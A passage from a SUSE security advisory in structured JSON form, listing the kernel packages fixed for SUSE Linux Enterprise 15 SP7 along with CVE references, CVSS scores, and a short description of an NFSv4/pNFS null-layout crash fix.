"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
